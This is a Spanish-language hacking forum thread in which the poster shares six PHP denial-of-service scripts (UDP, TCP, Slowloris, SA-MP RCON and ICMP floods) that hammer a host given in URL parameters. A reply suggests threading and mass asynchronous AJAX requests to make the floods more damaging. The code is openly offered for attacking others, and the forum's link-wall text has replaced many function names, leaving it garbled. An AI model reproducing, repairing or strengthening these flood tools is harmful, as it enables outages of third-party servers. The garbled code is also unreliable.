comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Metodos de DoS con PHP

  • 1 Respuestas
  • 1234 Vistas

0 Usuarios y 2 Visitantes están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5331
  • Actividad:
    56.67%
  • Reputación 29
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« en: Agosto 25, 2013, 11:59:51 pm »
UDP:

Código: PHP
  1.  <?php
  2. //UDP
  3. if(You are not allowed to view links. Register or Login($_GET['host'])&&You are not allowed to view links. Register or Login($_GET['time'])){
  4.     $packets = 0;
  5.     You are not allowed to view links. Register or Login(TRUE);
  6.     You are not allowed to view links. Register or Login(0);
  7.  
  8.    $exec_time = $_GET['time'];
  9.  
  10.    $time = You are not allowed to view links. Register or Login();
  11.     $max_time = $time+$exec_time;
  12.  
  13.    $host = $_GET['host'];
  14.  
  15.    for($i=0;$i<65000;$i++){
  16.     $out .= 'X';
  17.     }
  18.     while(1){
  19.     $packets++;
  20.     if(You are not allowed to view links. Register or Login() > $max_time){
  21.     break;
  22.     }
  23.     $rand = You are not allowed to view links. Register or Login(1,65000);
  24.     $fp = You are not allowed to view links. Register or Login('udp://'.$host, $rand, $errno, $errstr, 5);
  25.     if($fp){
  26.     You are not allowed to view links. Register or Login($fp, $out);
  27.     You are not allowed to view links. Register or Login($fp);
  28.     }
  29. ?>

UDP Method 2

Código: PHP
  1.  <?php
  2.  
  3. $host = $_GET['host'];
  4. You are not allowed to view links. Register or Login(0);
  5. $exec_time = (int)$_GET['time'];
  6. $time = You are not allowed to view links. Register or Login();
  7. $max_time = $time + $exec_time;
  8.  
  9.       if(You are not allowed to view links. Register or Login() > $max_time)
  10.  
  11.       {
  12.  
  13.          break;
  14.  
  15.       }
  16.  
  17. while(1){
  18.  
  19. $dataOut = “x08x00x10x26x74x65x73x74“;
  20.  
  21.       if ($_GET['port'] == "rand")
  22.  
  23.       {
  24.  
  25.          $rand = You are not allowed to view links. Register or Login(1,65535);
  26.  
  27.       }
  28.  
  29.       else
  30.  
  31.       {
  32.  
  33.          $rand = (int)filter($_GET['port']);
  34.  
  35.       }
  36.  
  37. $socket = You are not allowed to view links. Register or Login(AF_INET, SOCK_DGRAM, UDP);
  38.  
  39. You are not allowed to view links. Register or Login($socket);
  40.  
  41. You are not allowed to view links. Register or Login($socket, $host, $rand);
  42.  
  43. @You are not allowed to view links. Register or Login($socket, $dataOut, You are not allowed to view links. Register or Login($dataOut));
  44.  
  45. You are not allowed to view links. Register or Login($socket);}
  46.  
  47. echo "UDP flood complete after: {$exec_time} seconds";
  48. ?>

TCP

Código: PHP
  1.  <?php
  2.     //TCP
  3.     if(You are not allowed to view links. Register or Login($_GET['host'])&&You are not allowed to view links. Register or Login($_GET['time'])){
  4.         $packets = 0;
  5.         You are not allowed to view links. Register or Login(TRUE);
  6.         You are not allowed to view links. Register or Login(0);
  7.        
  8.         $exec_time = $_GET['time'];
  9.        
  10.         $time = You are not allowed to view links. Register or Login();
  11.         $max_time = $time+$exec_time;
  12.      
  13.         $host = $_GET['host'];
  14.         $port = $_GET['port'];
  15.        
  16.         for($i=0;$i<65000;$i++){
  17.                 $out .= 'X';
  18.         }
  19.         while(1){
  20.         $packets++;
  21.                 if(You are not allowed to view links. Register or Login() > $max_time){
  22.                         break;
  23.                 }              
  24.                 $fp = You are not allowed to view links. Register or Login('tcp://'.$host, $port, $errno, $errstr, 5);
  25.                 if($fp){
  26.                         You are not allowed to view links. Register or Login($fp, $out);
  27.                         You are not allowed to view links. Register or Login($fp);
  28.                 }
  29.     ?>

Slowloris

Código: PHP
  1.  <?php
  2. $ip = $_GET['ip'];
  3. You are not allowed to view links. Register or Login(0);
  4. You are not allowed to view links. Register or Login(FALSE);
  5.  
  6. $exec_time = $_GET['time'];
  7. $time = You are not allowed to view links. Register or Login();
  8. $max_time = $time+$exec_time;
  9.  
  10. while(1){
  11.   if(You are not allowed to view links. Register or Login() > $max_time){
  12.     break;
  13.   }
  14.  
  15.   $fp = You are not allowed to view links. Register or Login($ip, 80, $errno, $errstr, 140);
  16.   if (!$fp) {
  17.     echo "$errstr ($errno)<br />\n";
  18.   } else {
  19.     $out = "POST / HTTP/1.1\r\n";
  20.     $out .= "Host: $ip\r\n";
  21.     $out .= "User-Agent: Opera/9.21 (Windows NT 5.1; U; en)\r\n";
  22.     $out .= "Content-Length: 42\r\n\r\n";
  23.  
  24.     You are not allowed to view links. Register or Login($fp, $out);
  25. }
  26. }
  27. echo "Slowloris flood complete after: $exec_time seconds\n";
  28. ?>

SA-MP Rcon Flood

Código: PHP
  1.  <?php
  2. if(You are not allowed to view links. Register or Login($_GET['host'])&&You are not allowed to view links. Register or Login($_GET['port'])&&You are not allowed to view links. Register or Login($_GET['time'])){
  3.     $packets = 0;
  4.     $fakepass = "4azr46a";
  5.     $fakecmd = "exit";
  6.     $sPacket = "";  
  7.     You are not allowed to view links. Register or Login(TRUE);
  8.     You are not allowed to view links. Register or Login(0);
  9.    
  10.     $exec_time = $_GET['time'];    
  11.     $time = You are not allowed to view links. Register or Login();
  12.     $max_time = $time+$exec_time;
  13.     $host = $_GET['host'];    
  14.     $port = $_GET['port'];    
  15.    
  16.     $aIPAddr = You are not allowed to view links. Register or Login('.', $host);
  17.     $sPacket .= "SAMP";
  18.  
  19.     $sPacket .= You are not allowed to view links. Register or Login($aIPAddr[0]);
  20.     $sPacket .= You are not allowed to view links. Register or Login($aIPAddr[1]);
  21.     $sPacket .= You are not allowed to view links. Register or Login($aIPAddr[2]);
  22.     $sPacket .= You are not allowed to view links. Register or Login($aIPAddr[3]);
  23.  
  24.     $sPacket .= You are not allowed to view links. Register or Login($port & 0xFF);
  25.     $sPacket .= You are not allowed to view links. Register or Login($port >> 8 & 0xFF);
  26.  
  27.     $sPacket .= 'x';
  28.    
  29.     $sPacket .= You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($fakepass) & 0xFF);
  30.     $sPacket .= You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($fakepass) >> 8 & 0xFF);
  31.     $sPacket .= $fakepass;
  32.     $sPacket .= You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($fakecmd) & 0xFF);
  33.     $sPacket .= You are not allowed to view links. Register or Login(You are not allowed to view links. Register or Login($fakecmd) >> 8 & 0xFF);
  34.     $sPacket .= $fakecmd;
  35.    
  36.     while(1){
  37.     $packets++;
  38.             if(You are not allowed to view links. Register or Login() > $max_time){
  39.                     break;
  40.             }
  41.             //$rand = rand(1,65000);
  42.             $fp = You are not allowed to view links. Register or Login('udp://'.$host, $port, $errno, $errstr, 2);
  43.             You are not allowed to view links. Register or Login($fp, $sPacket);
  44.             if($fp){
  45.                     You are not allowed to view links. Register or Login($rSocket, $sPacket);
  46.                     You are not allowed to view links. Register or Login($fp);
  47.             }
  48. ?>

ICMP

Código: PHP
  1.  <?php
  2.  
  3. $host = $_GET['host'];
  4. You are not allowed to view links. Register or Login(0);
  5. $exec_time = $_GET['time'];
  6. $time = You are not allowed to view links. Register or Login();
  7. $max_time = $time + $exec_time;
  8.  
  9.       if(You are not allowed to view links. Register or Login() > $max_time)
  10.  
  11.       {
  12.  
  13.          break;
  14.  
  15.       }
  16.  
  17. while(1){
  18. // 08 (ECHO), 00 (No Code), 10 26 (Checksum), 74 65 73 74 (The data: “test”)
  19. $dataOut = “x08x00x10x26x74x65x73x74“;
  20.  
  21. // Raw socket, ICMP protocol
  22. $socket = You are not allowed to view links. Register or Login(AF_INET, SOCK_RAW, 1);
  23.  
  24. // Non blocking as in the actual script it is many sockets to different machines
  25. You are not allowed to view links. Register or Login($socket);
  26.  
  27. // Connect to local machine (or any machine)
  28. You are not allowed to view links. Register or Login($socket, $host, null);
  29.  
  30. // Send $dataOut
  31. @You are not allowed to view links. Register or Login($socket, $dataOut, You are not allowed to view links. Register or Login($dataOut));
  32.  
  33. // Close socket
  34. You are not allowed to view links. Register or Login($socket);}
  35.  
  36. echo "ICMP flood complete after: {$exec_time} seconds";
  37. ?>

El autor original de los codigos es: io.kent

Saludos!
ANTRAX


Desconectado WHK

  • *
  • Underc0der
  • Mensajes: 68
  • Actividad:
    16.67%
  • Reputación 3
  • 吴阿卡
    • Ver Perfil
    • WHK
« Respuesta #1 en: Agosto 30, 2013, 10:09:40 am »
Hola, se ven buenos pero todos son sincronicos, eso quiere decir que envia los paquetes uno por uno y eso no le hace daño a nadie, lo que si podría servir es hacer hilos de proceso con php ( You are not allowed to view links. Register or Login ), eso quiere decir enviar sus 100 paquetes simultaneos por segundo, eso si podría resultar.

Lo otro sería sin utilizar pecl utilizando ajax haciendo peticiones asincronicas, o sea hacer de 50 en 50 peticiones cada 1 segundo al archivo php pero puede correr el riesgo de que el servidor local colapse debido a que habrán demasiadas peticiones sin terminar, de alguna manera habría que controlar que se envien 50 conecciones y que cada ves que se desconecte una que lo vuelva a reconectar de manera automatica, eso si sería muy dañino y sin utilizar los famosos iframes que al final terminan consumiendo muchisima cpu.

También podrian hacerse ataques via ajax solicitando cabeceras de tipo json o xml debido a la politica de sitios cruzados de los navegadores, esta petición se abortará una ves terminada la solicitud asi que alcanzará de todas maneras a realizar el ataque sin problemas.
You are not allowed to view links. Register or Login - The Hacktivism is not a crime - Si no lo hago yo, que lo hagan otros -

 

¿Te gustó el post? COMPARTILO!



[Sugerencia] Metodos de encriptacion de contraseñas

Iniciado por Only

Respuestas: 2
Vistas: 1041
Último mensaje Febrero 07, 2014, 12:45:05 pm
por alexander1712